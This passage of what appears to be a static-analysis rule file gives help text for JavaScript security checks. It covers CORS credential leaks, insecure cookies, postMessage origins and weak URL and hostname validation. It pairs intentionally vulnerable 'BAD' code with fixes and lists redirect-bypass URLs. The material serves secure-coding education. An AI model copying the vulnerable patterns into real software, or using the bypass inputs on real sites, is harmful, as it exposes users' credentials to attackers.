[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", - "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], - "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", - "id" : "js/cors-misconfiguration-for-credentials", - "kind" : "path-problem", - "name" : "CORS misconfiguration for credentials transfer", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/functionality-from-untrusted-source", - "name" : "js/functionality-from-untrusted-source", - "shortDescription" : { - "text" : "Inclusion of functionality from an untrusted source" - }, - "fullDescription" : { - "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. 
When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", - "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. 
When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). 
Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-830" ], - "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", - "id" : "js/functionality-from-untrusted-source", - "kind" : "problem", - "name" : "Inclusion of functionality from an untrusted source", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.0" - } - }, { - "id" : "js/clear-text-cookie", - "name" : "js/clear-text-cookie", - "shortDescription" : { - "text" : "Clear text transmission of sensitive cookie" - }, - "fullDescription" : { - "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", - "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], - "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", - "id" : "js/clear-text-cookie", - "kind" : "problem", - "name" : "Clear text transmission of sensitive cookie", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/cross-window-information-leak", - "name" : "js/cross-window-information-leak", - "shortDescription" : { - "text" : "Cross-window communication with unrestricted target origin" - }, - "fullDescription" : { - "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], - "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", - "id" : "js/cross-window-information-leak", - "kind" : "path-problem", - "name" : "Cross-window communication with unrestricted target origin", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "4.3" - } - }, { - "id" : "js/incomplete-url-substring-sanitization", - "name" : "js/incomplete-url-substring-sanitization", - "shortDescription" : { - "text" : "Incomplete URL substring sanitization" - }, - "fullDescription" : { - "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. 
Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", - "id" : "js/incomplete-url-substring-sanitization", - "kind" : "problem", - "name" : "Incomplete URL substring sanitization", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-hostname-regexp", - "name" : "js/incomplete-hostname-regexp", - "shortDescription" : { - "text" : "Incomplete regular expression for hostnames" - }, - "fullDescription" : { - "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part 
of the hostname might match more hostnames than expected.", - "id" : "js/incomplete-hostname-regexp", - "kind" : "problem", - "name" : "Incomplete regular expression for hostnames", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incorrect-suffix-check", - "name" : "js/incorrect-suffix-check", - "shortDescription" : { - "text" : "Incorrect suffix check" - }, - "fullDescription" : { - "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], - "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", - "id" : "js/incorrect-suffix-check", - "kind" : "problem", - "name" : "Incorrect suffix check", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/useless-regexp-character-escape", - "name" : "js/useless-regexp-character-escape", - "shortDescription" : { - "text" : "Useless regular-expression character escape" - }, - "fullDescription" : { - "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. 
In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. 
Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic 